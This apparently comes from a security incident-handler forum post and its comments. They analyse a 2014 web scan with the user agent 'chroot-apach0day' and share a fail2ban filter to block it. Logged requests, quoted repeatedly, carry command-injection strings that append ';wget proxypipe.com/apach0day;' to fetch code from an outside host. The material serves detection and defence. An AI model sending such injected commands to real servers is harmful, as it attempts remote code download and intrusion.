Interesting HTTP User Agent "chroot-apach0day"
Our reader Robin submitted the following detect:
I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day
The URL that appears to be retrieved does not exist, even though the domain does.
In our own web logs, we have seen a couple of similar requests:
162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day"
There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
Application Security: Securing Web Apps, APIs, and Microservices | Online | US Eastern | Jan 27th - Feb 1st 2025 |
Comments
Machine 1:
T 162.253.66.77:56655 -> 10.178.172.97:80 [AP]
GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
T 10.178.172.97:80 -> 162.253.66.77:56655 [A]
HTTP/1.1 500 Internal Server Error.
Content-Type: image/png.
Content-Length: 928.
Date: Mon, 28 Jul 2014 20:49:51 GMT.
Connection: close.
===========================
Machine 2:
T 162.253.66.77:56655 -> 10.209.31.105:80 [AP]
GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
T 10.209.31.105:80 -> 162.253.66.77:56655 [A]
HTTP/1.1 500 Internal Server Error.
Content-Type: image/png.
Content-Length: 928.
Date: Mon, 28 Jul 2014 20:10:22 GMT.
Connection: close.
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago
If you have fail2ban installed, see below. Note locations of the fail2ban files might be different, depending on your OS. The example below is from a Debian server. This sample doesn't cover ban times, etc.---just how to create a filter and add it to jail.local. There are plenty of fail2ban config examples on google for multiple systems.
Quick-And-Dirty (Debian Linux):
1) Create a new file apache-0day.conf in /etc/fail2ban/filter.d that contains:
#Fail2Ban configuration file
#Limited filter to stop apach0day attacks
[Definition]
Option: failregex
#Notes.: regex to match this kind of request:
#162.253.66.77 - - [28/Jul/2014:19:02:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 359 "-" "chroot-apach0day"
failregex = ^ -."(GET|POST).\?.proxypipe|apach0day.$
Option: ignoreregex
Notes.: regex to ignore. If this regex matches, the line is ignored.
Values: TEXT
# ignoreregex =
2) Test filter with command: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf
3) Edit /etc/fail2banl/jail.local, to add this jail:
[apache-0day] enabled = true port = http,https filter = apache-0day logpath = /var/log/apache*/*access.log maxretry = 2
4) Test the new overall configuration (watch for WARNING and fix, if needed): fail2ban-client -d
5) Re-start fail2ban: /etc/init.d/fail2ban restart
Anonymous
Jul 29th 2014
1 decade ago
I can't make head or tails of the code, it looks like it has been obfuscated
Anonymous
Jul 29th 2014
1 decade ago
162.253.66.77 - - [28/Jul/2014:06:03:18 +0100] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:20:28:57 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:20:42:02 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
Nothing untoward has happened (the 200 response here is because the front page on this site is flat HTML, so the query string was ignored).
Anonymous
Jul 29th 2014
1 decade ago
162.253.66.77 - - [28/Jul/2014:06:21:18 +0100] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 640 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:22:56:35 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 640 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
Anonymous
Jul 29th 2014
1 decade ago
Link : http://www.alienvault.com/apps/rep_monitor/ip/162.253.66.77/?utm_channnel=InProduct&utm_source=OSSIM&utm_campaign=threatdetails
Anonymous
Jul 29th 2014
1 decade ago
May 07 19:03:47 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:9359 -> <REMOVED>:22 PR tcp len 20 48 -S IN
May 09 00:14:27 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:46341 -> <REMOVED>:1080 PR tcp len 20 40 -S IN
May 09 08:29:31 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:51666 -> <REMOVED>:5000 PR tcp len 20 40 -S IN
May 11 22:31:38 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:52724 -> <REMOVED>:23 PR tcp len 20 40 -S IN
May 11 23:01:56 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:52724 -> <REMOVED>:22 PR tcp len 20 40 -S IN
May 16 06:22:12 omb_ftp[51581]: INFO: connect from: 162.253.66.74 to: <REMOVED> redirect: <REMOVED>
May 16 06:22:12 omb_ftp[51581]: INFO: child pid: 43179 connect: 162.253.66.74 -> <REMOVED>
May 16 07:06:15 omb_ftp[51581]: INFO: connect from: 162.253.66.74 to: <REMOVED> redirect: <REMOVED>
May 16 07:06:15 omb_ftp[51581]: INFO: child pid: 46002 connect: 162.253.66.74 -> <REMOVED>
May 20 03:03:33 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:38261 -> <REMOVED>:1680 PR udp len 20 186 IN
May 26 22:29:32 ipmon[473]: Deny packet r#80:11 re3 162.253.66.76:55193 -> <REMOVED>:9200 PR tcp len 20 40 -S IN
Jun 12 00:50:10 kernel: No server on port re3 162.253.66.76:40409 -> <REMOVED>:60023 PR tcp -S
Jun 12 00:50:10 kernel: No server on port re3 162.253.66.76:40409 -> <REMOVED>:60023 PR tcp -R
Jun 16 17:53:04 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:54060 -> <REMOVED>:5060 PR tcp len 20 40 -S IN
Jun 21 01:16:33 kernel: No server on port re3 162.253.66.76:43183 -> <REMOVED>:49152 PR tcp -S
Jun 21 01:16:34 kernel: No server on port re3 162.253.66.76:43183 -> <REMOVED>:49152 PR tcp -R
Jun 25 05:07:50 omb_http[399]: INFO: [22127] 162.253.66.76 192.168.0.11:80 "GET /rutorrent HTTP/1.1" - 0 Client unexpectedly closed connection
Jun 25 11:24:25 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:44182 -> <REMOVED>:22 PR tcp len 20 40 -S IN
Jun 25 18:24:31 omb_http[399]: INFO: [21114] 162.253.66.77:52663 192.168.0.11:80 <none> "GET /rutorrent HTTP/1.0" text/html 301 235
Jun 26 14:12:39 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:42694 -> <REMOVED>:443 PR tcp len 20 40 -S IN
Jun 26 17:40:44 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:54925 -> <REMOVED>:8112 PR tcp len 20 40 -S IN
Jul 06 21:27:42 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:42286 -> <REMOVED>:11211 PR udp len 20 43 IN
Jul 11 12:04:25 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:49029 -> <REMOVED>:27015 PR tcp len 20 40 -S IN
Jul 11 16:29:19 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:40895 -> <REMOVED>:8112 PR tcp len 20 40 -S IN
Jul 11 17:04:37 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:50855 -> <REMOVED>:23 PR tcp len 20 40 -S IN
Jul 26 02:11:06 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:46535 -> <REMOVED>:3128 PR tcp len 20 40 -S IN
Jul 28 01:03:30 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:57550 -> <REMOVED>:23 PR tcp len 20 40 -S IN
Jul 28 08:58:46 omb_http[399]: INFO: [27652] 162.253.66.77:41790 192.168.0.11:80 <none> "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" text/html 301 297
Jul 28 22:56:58 omb_http[399]: INFO: [42857] 162.253.66.77:56655 192.168.0.11:80 <none> "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" text/html 301 303
To me it looks like a really slow scan with some added features (apach0day and rutorrent).
Regarding potential threats, even if Apache itself isnt/might not be vulnerable - what about other systems? For example various webstatsscript such as Awstats among others (who acts on whats found in the accesslog)?
My best guess:
1) Someone doing their final preparations before their talk at defcon/blackhat.
_OR_
2) Someone from 4chan trolling the rest of the Internet :-)
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago